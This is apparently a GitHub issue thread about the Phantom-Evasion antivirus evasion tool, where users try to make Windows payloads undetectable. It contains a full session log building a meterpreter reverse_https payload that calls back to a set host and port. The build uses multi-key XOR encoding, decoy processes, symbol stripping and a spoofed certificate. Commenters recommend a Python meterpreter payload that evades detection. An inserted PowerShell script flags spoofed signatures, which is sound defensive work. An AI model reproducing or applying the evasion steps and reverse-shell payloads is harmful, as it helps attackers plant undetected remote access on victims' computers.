oddcod3 / Phantom-Evasion

Python antivirus evasion tool
GNU General Public License v3.0

How to generate undetectable payload? #47

Open w4cky opened 5 years ago

w4cky commented 5 years ago

I have a problem. Every payload that I create for Windows is detected, even by the free Avast. What am I doing wrong? I tried various options for Windows. I will paste one of them below so that you can see exactly.

I tried Windows modules -> Shellcode Injection or Stager -> I've probably tried all the options for these modules.

Can you tell me what I'm doing wrong? ;)

```text
[] choose how to supply shellcode:
[1] Msfvenom
[2] Custom shellcode
[0] Back
[>] Please insert option: 1
[>] Please enter msfvenom payload (example: windows/meterpreter/reverse_tcp):windows/meterpreter/reverse_https
[>] Please insert LHOST: 192.168.51.2
[>] Please insert LPORT: 443
[>] Custom msfvenom options(default: blank):
[>] Encoding step:
[1] x86/xor_dynamic (average)
[2] x86/xor_dynamic + Multibyte-key xor (good)
[3] x86/xor_dynamic + Double Multibyte-key xor (excellent)
[4] x86/xor_dynamic + Triple Multibyte-key xor (excellent)
[>] Please enter options number: 4
[>] Enter output filename: michal-443
[>] Spawn Multiple Processes:
During target-side execution this will cause to spawn a maximum of 4 processes consequentialy.
Only the last spawned process will reach the malicious section of code while the other decoy processes spawned before will executes only random junk code
[>] Add multiple processes behaviour?(y/n): y
[>] Insert number of decoy processes (integer between 1-3): 2
[>] Generating code...
[-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload
Found 1 compatible encoders
Attempting to encode payload with 1 iterations of x86/xor_dynamic
x86/xor_dynamic succeeded with size 519 (iteration=0)
x86/xor_dynamic chosen with final size 519
Payload size: 519 bytes
Final size of c file: 2205 bytes
[>] Triple-key Xor multibyte encoding...
[>] Compiling...
[>] Strip
strip is a GNU utility to "strip" symbols from object files.
This is useful for minimizing their file size, streamlining them for distribution.
It can also be useful for making it more difficult to reverse-engineer the compiled code.
(Lower rate of detection)
[>] Strip executable? (y/n):y
[>] Stripping...
[>] Sign Executable
Online Certificate spoofer & Executabe signer (Lower rate of detection)
[>] Sign executable? (y/n):y
Certificates directory is not empty , use already existing certificate? (y/n): n
[>] Insert certificate spoofing target (default: www.microsoft.com:443): www.google.com:443
[>] Insert sign software description (default: Notepad Benchmark Util):
[>] Signing m443.exe with osslsigncode...
[>] Succeeded
[<>] File saved in Phantom-Evasion folder
```
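The "certificate spoofer" step in the session above signs the binary with a certificate that merely copies the subject of a public site; it does not chain to a root Windows trusts. The following PowerShell triage script is an added example (not part of Phantom-Evasion or this thread) showing how a defender can surface such binaries: it assumes a folder path to scan and reports every signed file whose Authenticode status is not `Valid`, marking self-issued certificates.

```powershell
# Added example, not Phantom-Evasion code: list executables whose Authenticode
# signature Windows does not trust. A self-signed certificate cloned from a public
# site shows a convincing Subject but Subject equals Issuer and the chain does not
# end at a trusted root, so Get-AuthenticodeSignature reports NotTrusted or
# UnknownError instead of Valid.
param(
    [string]$Path = '.'   # assumption: directory to scan (recursively)
)

Get-ChildItem -Path $Path -Include *.exe, *.dll -Recurse -File |
    ForEach-Object {
        $sig  = Get-AuthenticodeSignature -FilePath $_.FullName
        $cert = $sig.SignerCertificate
        [pscustomobject]@{
            File       = $_.FullName
            Status     = $sig.Status
            Subject    = if ($cert) { $cert.Subject } else { '' }
            Issuer     = if ($cert) { $cert.Issuer }  else { '' }
            # Subject identical to Issuer means the signer vouched for itself
            SelfSigned = if ($cert) { $cert.Subject -eq $cert.Issuer } else { $false }
        }
    } |
    # Unsigned files are a separate question; focus on signatures that claim
    # a publisher but fail validation.
    Where-Object { $_.Status -ne 'Valid' -and $_.Status -ne 'NotSigned' } |
    Sort-Object SelfSigned -Descending |
    Format-Table -AutoSize
```

Any row with `SelfSigned` set to True and a Subject naming a well-known domain is exactly the artefact the signing step produces and is worth pulling for analysis.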

dsx12 commented 5 years ago

Windows Defender has stepped its game up; likely you can't backdoor them anymore. Even the msf5 evasion modules were patched a few days after release.

EnumType commented 5 years ago

You can use the python/meterpreter/reverse_tcp payload. It works for me :D

pretech86 commented 5 years ago

@thejavaezception can you explain more please? I can't find the python payload in the Phantom-Evasion choices. Can you explain more please?

azamet90 commented 4 years ago

> You can use the python/meterpreter/reverse_tcp payload. It works for me :D

Yes, but you cannot make it persistent (you are just answering for the sake of answering).